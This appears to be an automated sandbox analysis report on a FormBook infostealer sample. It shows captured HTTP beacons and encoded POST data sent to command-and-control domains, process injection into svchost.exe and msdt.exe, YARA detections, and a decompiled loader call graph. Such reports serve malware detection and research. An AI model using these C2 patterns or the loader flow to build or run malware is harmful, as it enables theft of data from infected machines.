                                                              Nov 24, 2024 08:36:42.708466053 CET1749OUTPOST /qp0h/ HTTP/1.1
                                                              Host: www.lirio.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.lirio.shop
                                                              Referer: http://www.lirio.shop/qp0h/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 57 69 32 4c 78 64 49 48 79 44 6b 69 43 31 78 39 47 35 5a 63 56 65 2b 4b 4a 4d 75 65 50 78 65 61 39 64 77 30 47 66 59 77 47 33 2f 2f 34 67 37 39 6e 30 56 5a 44 57 54 6f 63 54 6f 71 41 59 48 79 65 30 62 48 79 31 46 65 4e 64 64 72 77 45 68 59 62 4b 39 55 74 72 70 52 2b 73 6e 56 31 39 51 6c 66 4e 54 47 47 79 32 44 69 51 47 54 33 4a 4b 6f 6e 35 4c 66 44 6c 44 2f 30 64 65 71 58 67 42 62 7a 63 32 44 5a 31 4a 32 33 49 75 6a 6c 4b 37 33 66 47 7a 73 38 63 2b 54 45 4f 39 4c 58 34 64 58 52 50 64 38 31 79 4c 48 4e 2f 6d 78 44 50 7a 4e 4e 4b 77 4a 58 62 4a 5a 64 6d 33 58 74 44 55 47 33 68 78 63 73 4a 59 49 6c 36 6c 76 75 51 51 56 43 68 59 6e 65 34 61 72 43 55 57 42 30 42 30 70 55 70 35 74 30 76 35 72 58 48 2b 76 4c 53 59 4d 6a 4f 71 36 6f 39 78 38 53 69 44 30 38 52 6e 30 47 43 31 73 36 34 36 4b 62 74 75 35 77 2f 6a 55 51 68 2b 67 47 2b 56 54 58 72 37 4d 66 73 46 42 6e 30 68 34 6d 47 6d 51 59 61 69 6a 64 73 74 34 43 64 64 37 47 66 76 75 37 56 57 6d 6b 62 61 45 42 6d 53 38 49 67 59 50 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh=CWi2LxdIHyDkiC1x9G5ZcVe+KJMuePxea9dw0GfYwG3//4g79n0VZDWTocToqAYHye0bHy1FeNddrwEhYbK9UtrpR+snV19QlfNTGGy2DiQGT3JKon5LfDlD/0deqXgBbzc2DZ1J23IujlK73fGzs8c+TEO9LX4dXRPd81yLHN/mxDPzNNKwJXbJZdm3XtDUG3hxcsJYIl6lvuQQVChYne4arCUWB0B0pUp5t0v5rXH+vLSYMjOq6o9x8SiD08Rn0GC1s646Kbtu5w/jUQh+gG+VTXr7MfsFBn0h4mGmQYaijdst4Cdd7Gfvu7VWmkbaEBmS8IgYPP3gFTlbzDlrLvR36FVCNzIqnare0abyNVkT9Bm5KdETLxZGM5Omzd2LKbg9x0+h7pnShWm4ffbvfjCtv8PCRh6j/2WwdzkgMpKqMlfe5JtmSjfcf3bSK+A2QhMPwUFYtOPcuUhYhEgxdr3Q8UesYkLHorQNQ4Xed0x6CEaOt9go0Umi07OIhdL3LoLdAOKSuzAgSjweRjoQUdKOtRrHoaZE7gB7lOAyG47nu+87yNmBdueJ9cSaFPlQ/eiAkR9pCIgRp6duUQkzmtopNQ/rdgRmITOwFSLFBP1iunLTEx3FDP4eGR+1SJ1p6SjK3zcq9X+QDo1sk+7RuJwAeBY7TSU918NQ4zofJOqHXn3x9iVEpEyio7TjAkw9GH+iRSZLBB1d9jWxbVr5b/SPScD+NNHwk8pjDpaRJo4brhTzNqxb8NfNz1V/hXktFEKXr/p5kT1nIFpLuI8xFe1o9rrL2/ITwT0EOe2yGsBPPTautmd+zC7V1RhbW9OUzD9O+Iye0ZU7WxeUu8q1bLtqKVmEV579GCQhm64Wc7kS1CLX4eDhOiljIWnOfvgYDa5IEe8pU4F2GQDLr9kOp5WACvO94841K9WTeiUijuZ4qEbFvUQJ4j38m90p62t32T36esvP/c7fJkrWf1B0WauQ8p8Bjs9bIcO0db7i2j9 [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.75000013.248.169.4880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:45.363579988 CET457OUTGET /qp0h/?jp30l4Dh=PUKWIHREPS7WoV9Y7jBwDAi8MdJvbPlJZ9RV9HOL13mBnPAwzQgZHDWQnYS4lWYAxPM5HQ5Ne4pDukEiRp2IEMb3TN5ZVyBIh4N3fT3PNmVkN2Qc3E0TfDZCxTFFsCUQYSNOCPRw5FgL&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.lirio.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:36:46.501184940 CET418INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Sun, 24 Nov 2024 07:36:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 278
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6a 70 33 30 6c 34 44 68 3d 50 55 4b 57 49 48 52 45 50 53 37 57 6f 56 39 59 37 6a 42 77 44 41 69 38 4d 64 4a 76 62 50 6c 4a 5a 39 52 56 39 48 4f 4c 31 33 6d 42 6e 50 41 77 7a 51 67 5a 48 44 57 51 6e 59 53 34 6c 57 59 41 78 50 4d 35 48 51 35 4e 65 34 70 44 75 6b 45 69 52 70 32 49 45 4d 62 33 54 4e 35 5a 56 79 42 49 68 34 4e 33 66 54 33 50 4e 6d 56 6b 4e 32 51 63 33 45 30 54 66 44 5a 43 78 54 46 46 73 43 55 51 59 53 4e 4f 43 50 52 77 35 46 67 4c 26 59 68 38 3d 70 6c 30 70 72 68 52 70 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jp30l4Dh=PUKWIHREPS7WoV9Y7jBwDAi8MdJvbPlJZ9RV9HOL13mBnPAwzQgZHDWQnYS4lWYAxPM5HQ5Ne4pDukEiRp2IEMb3TN5ZVyBIh4N3fT3PNmVkN2Qc3E0TfDZCxTFFsCUQYSNOCPRw5FgL&Yh8=pl0prhRpj"}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.7500013.33.130.19080520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:52.163058996 CET734OUTPOST /4knb/ HTTP/1.1
                                                              Host: www.espiritismo.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.espiritismo.info
                                                              Referer: http://www.espiritismo.info/4knb/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 70 45 4a 38 2f 6f 75 39 49 69 6f 36 67 37 73 31 43 31 78 74 77 33 33 4c 37 75 77 6b 35 36 58 69 37 77 6d 6f 4f 75 4b 6a 66 32 39 64 73 4f 76 57 52 77 55 54 51 7a 6d 41 52 4f 5a 64 78 50 75 56 69 6b 44 68 76 4c 6f 47 53 4f 35 75 7a 31 55 4b 62 48 41 61 79 33 47 46 55 69 48 4d 39 70 64 68 56 43 4e 51 58 6c 4f 44 32 58 4f 38 4f 50 33 64 53 38 4c 33 32 68 6c 71 4b 4d 49 6b 75 68 31 50 6d 38 33 6c 68 79 35 70 42 62 35 4f 50 37 77 79 35 4d 42 72 4e 50 6d 4f 75 6d 64 36 43 76 69 4d 52 74 42 42 50 78 2f 32 35 6c 6a 35 37 44 56 4f 42 53 39 4c 62 31 30 39 70 62 6e 69 77 4a 6d 47 41 58 64 43 78 64 7a 6e 77 64 6a 4a 73 49 46 43 67 41 3d 3d
                                                              Data Ascii: jp30l4Dh=pEJ8/ou9Iio6g7s1C1xtw33L7uwk56Xi7wmoOuKjf29dsOvWRwUTQzmAROZdxPuVikDhvLoGSO5uz1UKbHAay3GFUiHM9pdhVCNQXlOD2XO8OP3dS8L32hlqKMIkuh1Pm83lhy5pBb5OP7wy5MBrNPmOumd6CviMRtBBPx/25lj57DVOBS9Lb109pbniwJmGAXdCxdznwdjJsIFCgA==


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:02:33:45
                                                              Start date:24/11/2024
                                                              Path:C:\Users\user\Desktop\santi.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\santi.exe"
                                                              Imagebase:0x2e0000
                                                              File size:1'214'464 bytes
                                                              MD5 hash:C086DE804062F1C6EBF2E42057187B24
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:02:33:46
                                                              Start date:24/11/2024
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\santi.exe"
                                                              Imagebase:0xb20000
                                                              File size:46'504 bytes
                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:10
                                                              Start time:03:50:27
                                                              Start date:24/11/2024
                                                              Path:C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe"
                                                              Imagebase:0x9c0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:11
                                                              Start time:03:50:28
                                                              Start date:24/11/2024
                                                              Path:C:\Windows\SysWOW64\msdt.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\msdt.exe"
                                                              Imagebase:0x850000
                                                              File size:389'632 bytes
                                                              MD5 hash:BAA4458E429E7C906560FE4541ADFCFB
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              General

                                                              Target ID:12
                                                              Start time:03:50:43
                                                              Start date:24/11/2024
                                                              Path:C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe"
                                                              Imagebase:0x9c0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:16
                                                              Start time:03:50:56
                                                              Start date:24/11/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff722870000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:3.4%
                                                                Dynamic/Decrypted Code Coverage:2%
                                                                Signature Coverage:8.3%
                                                                Total number of Nodes:1809
                                                                Total number of Limit Nodes:155
                                                                execution_graph 92378 e17320 92392 e14f70 92378->92392 92380 e17409 92395 e17210 92380->92395 92382 e17432 CreateFileW 92384 e17481 92382->92384 92385 e17486 92382->92385 92385->92384 92386 e1749d VirtualAlloc 92385->92386 92386->92384 92387 e174bb ReadFile 92386->92387 92387->92384 92388 e174d6 92387->92388 92389 e16210 13 API calls 92388->92389 92391 e17509 92389->92391 92390 e1752c ExitProcess 92390->92384 92391->92390 92394 e155fb 92392->92394 92398 e18430 GetPEB 92392->92398 92394->92380 92396 e17219 Sleep 92395->92396 92397 e17227 92396->92397 92398->92394 92399 32bb64 92400 32bb71 92399->92400 92401 32bb77 92399->92401 92407 301c9d 92400->92407 92403 32bb88 92401->92403 92404 301c9d _free 47 API calls 92401->92404 92405 32bb9a 92403->92405 92406 301c9d _free 47 API calls 92403->92406 92404->92403 92406->92405 92408 301ccf __dosmaperr 92407->92408 92409 301ca6 RtlFreeHeap 92407->92409 92408->92401 92409->92408 92410 301cbb 92409->92410 92413 307c0e 47 API calls __getptd_noexit 92410->92413 92412 301cc1 GetLastError 92412->92408 92413->92412 92414 3519dd 92419 2e4a30 92414->92419 92416 3519f1 92439 300f0a 52 API calls __cinit 92416->92439 92418 3519fb 92420 2e4a40 __ftell_nolock 92419->92420 92440 2ed7f7 92420->92440 92424 2e4aff 92452 2e363c 92424->92452 92431 2ed7f7 48 API calls 92432 2e4b32 92431->92432 92474 2e49fb 92432->92474 92434 2e4b43 Mailbox 92434->92416 92435 2e61a6 48 API calls 92436 2e4b3d _wcscat Mailbox __NMSG_WRITE 92435->92436 92436->92434 92436->92435 92438 2e64cf 48 API calls 92436->92438 92488 2ece19 92436->92488 92438->92436 92439->92418 92494 2ff4ea 92440->92494 92442 2ed818 92443 2ff4ea 48 API calls 92442->92443 92444 2e4af6 92443->92444 92445 2e5374 92444->92445 92525 30f8a0 92445->92525 92448 2ece19 48 API calls 92449 2e53a7 92448->92449 92527 2e660f 92449->92527 92451 2e53b1 Mailbox 92451->92424 92453 2e3649 __ftell_nolock 92452->92453 92572 2e366c GetFullPathNameW 92453->92572 92455 2e365a 92456 2e6a63 48 API calls 92455->92456 92457 2e3669 92456->92457 92458 2e518c 92457->92458 92459 2e5197 92458->92459 92460 2e519f 92459->92460 92461 351ace 92459->92461 92574 2e5130 92460->92574 92584 2e6b4a 48 API calls 92461->92584 92464 2e4b18 92468 2e64cf 92464->92468 92465 351adb __NMSG_WRITE 92466 2fee75 48 API calls 92465->92466 92467 351b07 ___crtGetEnvironmentStringsW 92466->92467 92469 2e651b 92468->92469 92473 2e64dd ___crtGetEnvironmentStringsW 92468->92473 92472 2ff4ea 48 API calls 92469->92472 92470 2ff4ea 48 API calls 92471 2e4b29 92470->92471 92471->92431 92472->92473 92473->92470 92591 2ebcce 92474->92591 92477 2e4a2b 92477->92436 92478 3541cc RegQueryValueExW 92479 3541e5 92478->92479 92480 354246 RegCloseKey 92478->92480 92481 2ff4ea 48 API calls 92479->92481 92482 3541fe 92481->92482 92597 2e47b7 92482->92597 92485 354224 92487 2e6a63 48 API calls 92485->92487 92486 35423b 92486->92480 92487->92486 92489 2ece28 __NMSG_WRITE 92488->92489 92490 2fee75 48 API calls 92489->92490 92491 2ece50 ___crtGetEnvironmentStringsW 92490->92491 92492 2ff4ea 48 API calls 92491->92492 92493 2ece66 92492->92493 92493->92436 92497 2ff4f2 __calloc_impl 92494->92497 92496 2ff50c 92496->92442 92497->92496 92498 2ff50e std::exception::exception 92497->92498 92503 30395c 92497->92503 92517 306805 RaiseException 92498->92517 92500 2ff538 92518 30673b 47 API calls _free 92500->92518 92502 2ff54a 92502->92442 92504 3039d7 __calloc_impl 92503->92504 92508 303968 __calloc_impl 92503->92508 92524 307c0e 47 API calls __getptd_noexit 92504->92524 92507 30399b RtlAllocateHeap 92507->92508 92516 3039cf 92507->92516 92508->92507 92510 303973 92508->92510 92511 3039c3 92508->92511 92514 3039c1 92508->92514 92510->92508 92519 3081c2 47 API calls __NMSG_WRITE 92510->92519 92520 30821f 47 API calls 6 library calls 92510->92520 92521 301145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92510->92521 92522 307c0e 47 API calls __getptd_noexit 92511->92522 92523 307c0e 47 API calls __getptd_noexit 92514->92523 92516->92497 92517->92500 92518->92502 92519->92510 92520->92510 92522->92514 92523->92516 92524->92516 92526 2e5381 GetModuleFileNameW 92525->92526 92526->92448 92528 30f8a0 __ftell_nolock 92527->92528 92529 2e661c GetFullPathNameW 92528->92529 92534 2e6a63 92529->92534 92531 2e6643 92545 2e6571 92531->92545 92535 2e6adf 92534->92535 92538 2e6a6f __NMSG_WRITE 92534->92538 92560 2eb18b 92535->92560 92537 2e6ab6 ___crtGetEnvironmentStringsW 92537->92531 92539 2e6a8b 92538->92539 92540 2e6ad7 92538->92540 92549 2e6b4a 48 API calls 92539->92549 92559 2ec369 48 API calls 92540->92559 92543 2e6a95 92550 2fee75 92543->92550 92546 2e657f 92545->92546 92547 2eb18b 48 API calls 92546->92547 92548 2e658f 92547->92548 92548->92451 92549->92543 92552 2ff4ea __calloc_impl 92550->92552 92551 30395c __crtGetStringTypeA_stat 47 API calls 92551->92552 92552->92551 92553 2ff50c 92552->92553 92554 2ff50e std::exception::exception 92552->92554 92553->92537 92564 306805 RaiseException 92554->92564 92556 2ff538 92565 30673b 47 API calls _free 92556->92565 92558 2ff54a 92558->92537 92559->92537 92561 2eb199 92560->92561 92563 2eb1a2 ___crtGetEnvironmentStringsW 92560->92563 92561->92563 92566 2ebdfa 92561->92566 92563->92537 92564->92556 92565->92558 92567 2ebe0d 92566->92567 92571 2ebe0a ___crtGetEnvironmentStringsW 92566->92571 92568 2ff4ea 48 API calls 92567->92568 92569 2ebe17 92568->92569 92570 2fee75 48 API calls 92569->92570 92570->92571 92571->92563 92573 2e368a 92572->92573 92573->92455 92575 2e513f __NMSG_WRITE 92574->92575 92576 351b27 92575->92576 92577 2e5151 92575->92577 92590 2e6b4a 48 API calls 92576->92590 92585 2ebb85 92577->92585 92580 2e515e ___crtGetEnvironmentStringsW 92580->92464 92581 351b34 92582 2fee75 48 API calls 92581->92582 92583 351b57 ___crtGetEnvironmentStringsW 92582->92583 92584->92465 92586 2ebb9b 92585->92586 92589 2ebb96 ___crtGetEnvironmentStringsW 92585->92589 92587 351b77 92586->92587 92588 2fee75 48 API calls 92586->92588 92588->92589 92589->92580 92590->92581 92592 2ebce8 92591->92592 92596 2e4a0a RegOpenKeyExW 92591->92596 92593 2ff4ea 48 API calls 92592->92593 92594 2ebcf2 92593->92594 92595 2fee75 48 API calls 92594->92595 92595->92596 92596->92477 92596->92478 92598 2ff4ea 48 API calls 92597->92598 92599 2e47c9 RegQueryValueExW 92598->92599 92599->92485 92599->92486 92600 e178cb 92601 e178d2 92600->92601 92602 e17970 92601->92602 92603 e178da 92601->92603 92620 e18220 9 API calls 92602->92620 92607 e17580 92603->92607 92606 e17957 92608 e14f70 GetPEB 92607->92608 92611 e1761f 92608->92611 92610 e17650 CreateFileW 92610->92611 92617 e1765d 92610->92617 92612 e17679 VirtualAlloc 92611->92612 92611->92617 92618 e17780 CloseHandle 92611->92618 92619 e17790 VirtualFree 92611->92619 92621 e18490 GetPEB 92611->92621 92613 e1769a ReadFile 92612->92613 92612->92617 92616 e176b8 VirtualAlloc 92613->92616 92613->92617 92614 e1787a 92614->92606 92615 e1786c VirtualFree 92615->92614 92616->92611 92616->92617 92617->92614 92617->92615 92618->92611 92619->92611 92620->92606 92622 e184ba 92621->92622 92622->92610 92623 2e3742 92624 2e374b 92623->92624 92625 2e37c8 92624->92625 92626 2e3769 92624->92626 92664 2e37c6 92624->92664 92628 2e37ce 92625->92628 92629 351e00 92625->92629 92630 2e382c PostQuitMessage 92626->92630 92631 2e3776 92626->92631 92627 2e37ab DefWindowProcW 92657 2e37b9 92627->92657 92632 2e37f6 SetTimer RegisterWindowMessageW 92628->92632 92633 2e37d3 92628->92633 92678 2e2ff6 16 API calls 92629->92678 92630->92657 92635 351e88 92631->92635 92636 2e3781 92631->92636 92640 2e381f CreatePopupMenu 92632->92640 92632->92657 92637 2e37da KillTimer 92633->92637 92638 351da3 92633->92638 92684 324ddd 60 API calls _memset 92635->92684 92641 2e3789 92636->92641 92642 2e3836 92636->92642 92675 2e3847 Shell_NotifyIconW _memset 92637->92675 92644 351ddc MoveWindow 92638->92644 92645 351da8 92638->92645 92639 351e27 92679 2fe312 346 API calls Mailbox 92639->92679 92640->92657 92648 351e6d 92641->92648 92649 2e3794 92641->92649 92668 2feb83 92642->92668 92644->92657 92652 351dac 92645->92652 92653 351dcb SetFocus 92645->92653 92648->92627 92683 31a5f3 48 API calls 92648->92683 92655 2e379f 92649->92655 92656 351e58 92649->92656 92650 351e9a 92650->92627 92650->92657 92652->92655 92658 351db5 92652->92658 92653->92657 92654 2e37ed 92676 2e390f DeleteObject DestroyWindow Mailbox 92654->92676 92655->92627 92680 2e3847 Shell_NotifyIconW _memset 92655->92680 92682 3255bd 70 API calls _memset 92656->92682 92677 2e2ff6 16 API calls 92658->92677 92663 351e68 92663->92657 92664->92627 92666 351e4c 92681 2e4ffc 67 API calls _memset 92666->92681 92669 2fec1c 92668->92669 92670 2feb9a _memset 92668->92670 92669->92657 92685 2e51af 92670->92685 92672 2fec05 KillTimer SetTimer 92672->92669 92673 2febc1 92673->92672 92674 353c7a Shell_NotifyIconW 92673->92674 92674->92672 92675->92654 92676->92657 92677->92657 92678->92639 92679->92655 92680->92666 92681->92664 92682->92663 92683->92664 92684->92650 92686 2e51cb 92685->92686 92687 2e52a2 Mailbox 92685->92687 92707 2e6b0f 48 API calls 92686->92707 92687->92673 92689 2e51d9 92690 353ca1 LoadStringW 92689->92690 92691 2e51e6 92689->92691 92694 353cbb 92690->92694 92692 2e6a63 48 API calls 92691->92692 92693 2e51fb 92692->92693 92693->92694 92695 2e520c 92693->92695 92696 2e510d 48 API calls 92694->92696 92697 2e5216 92695->92697 92698 2e52a7 92695->92698 92701 353cc5 92696->92701 92708 2e510d 92697->92708 92717 2e6eed 92698->92717 92702 2e518c 48 API calls 92701->92702 92704 2e5220 _memset _wcscpy 92701->92704 92703 353ce7 92702->92703 92706 2e518c 48 API calls 92703->92706 92705 2e5288 Shell_NotifyIconW 92704->92705 92705->92687 92706->92704 92707->92689 92709 2e511f 92708->92709 92710 351be7 92708->92710 92721 2eb384 92709->92721 92730 31a58f 48 API calls ___crtGetEnvironmentStringsW 92710->92730 92713 2e512b 92713->92704 92714 351bf1 92715 2e6eed 48 API calls 92714->92715 92716 351bf9 Mailbox 92715->92716 92718 2e6ef8 92717->92718 92719 2e6f00 92717->92719 92731 2edd47 48 API calls ___crtGetEnvironmentStringsW 92718->92731 92719->92704 92722 2eb392 92721->92722 92727 2eb3c5 ___crtGetEnvironmentStringsW 92721->92727 92723 2eb3fd 92722->92723 92724 2eb3b8 92722->92724 92722->92727 92725 2ff4ea 48 API calls 92723->92725 92726 2ebb85 48 API calls 92724->92726 92728 2eb407 92725->92728 92726->92727 92727->92713 92729 2ff4ea 48 API calls 92728->92729 92729->92727 92730->92714 92731->92719 92732 358eb8 92736 32a635 92732->92736 92734 358ec3 92735 32a635 84 API calls 92734->92735 92735->92734 92737 32a66f 92736->92737 92742 32a642 92736->92742 92737->92734 92738 32a671 92768 2fec4e 81 API calls 92738->92768 92740 32a676 92747 2e936c 92740->92747 92742->92737 92742->92738 92742->92740 92745 32a669 92742->92745 92743 32a67d 92744 2e510d 48 API calls 92743->92744 92744->92737 92767 2f4525 61 API calls ___crtGetEnvironmentStringsW 92745->92767 92748 2e9384 92747->92748 92765 2e9380 92747->92765 92749 2e93b0 __itow Mailbox _wcscpy 92748->92749 92750 354cbd __i64tow 92748->92750 92751 2e9398 92748->92751 92752 354bbf 92748->92752 92755 2ff4ea 48 API calls 92749->92755 92769 30172b 80 API calls 4 library calls 92751->92769 92753 354ca5 92752->92753 92758 354bc8 92752->92758 92770 30172b 80 API calls 4 library calls 92753->92770 92757 2e93ba 92755->92757 92761 2ece19 48 API calls 92757->92761 92757->92765 92758->92749 92759 354be7 92758->92759 92760 2ff4ea 48 API calls 92759->92760 92762 354c04 92760->92762 92761->92765 92763 2ff4ea 48 API calls 92762->92763 92764 354c2a 92763->92764 92764->92765 92766 2ece19 48 API calls 92764->92766 92765->92743 92766->92765 92767->92737 92768->92740 92769->92749 92770->92749 92771 305dfd 92772 305e09 type_info::_Type_info_dtor 92771->92772 92808 307eeb GetStartupInfoW 92772->92808 92774 305e0e 92810 309ca7 GetProcessHeap 92774->92810 92776 305e66 92777 305e71 92776->92777 92895 305f4d 47 API calls 3 library calls 92776->92895 92811 307b47 92777->92811 92780 305e77 92781 305e82 __RTC_Initialize 92780->92781 92896 305f4d 47 API calls 3 library calls 92780->92896 92832 30acb3 92781->92832 92784 305e91 92785 305e9d GetCommandLineW 92784->92785 92897 305f4d 47 API calls 3 library calls 92784->92897 92851 312e7d GetEnvironmentStringsW 92785->92851 92788 305e9c 92788->92785 92792 305ec2 92864 312cb4 92792->92864 92795 305ec8 92796 305ed3 92795->92796 92899 30115b 47 API calls 3 library calls 92795->92899 92878 301195 92796->92878 92799 305edb 92800 305ee6 __wwincmdln 92799->92800 92900 30115b 47 API calls 3 library calls 92799->92900 92882 2e3a0f 92800->92882 92803 305efa 92804 305f09 92803->92804 92901 3013f1 47 API calls _doexit 92803->92901 92902 301186 47 API calls _doexit 92804->92902 92807 305f0e type_info::_Type_info_dtor 92809 307f01 92808->92809 92809->92774 92810->92776 92903 30123a 30 API calls 2 library calls 92811->92903 92813 307b4c 92904 307e23 InitializeCriticalSectionAndSpinCount 92813->92904 92815 307b51 92816 307b55 92815->92816 92906 307e6d TlsAlloc 92815->92906 92905 307bbd 50 API calls 2 library calls 92816->92905 92819 307b5a 92819->92780 92820 307b67 92820->92816 92821 307b72 92820->92821 92907 306986 92821->92907 92824 307bb4 92915 307bbd 50 API calls 2 library calls 92824->92915 92827 307bb9 92827->92780 92828 307b93 92828->92824 92829 307b99 92828->92829 92914 307a94 47 API calls 4 library calls 92829->92914 92831 307ba1 GetCurrentThreadId 92831->92780 92833 30acbf type_info::_Type_info_dtor 92832->92833 92924 307cf4 92833->92924 92835 30acc6 92836 306986 __calloc_crt 47 API calls 92835->92836 92837 30acd7 92836->92837 92838 30ad42 GetStartupInfoW 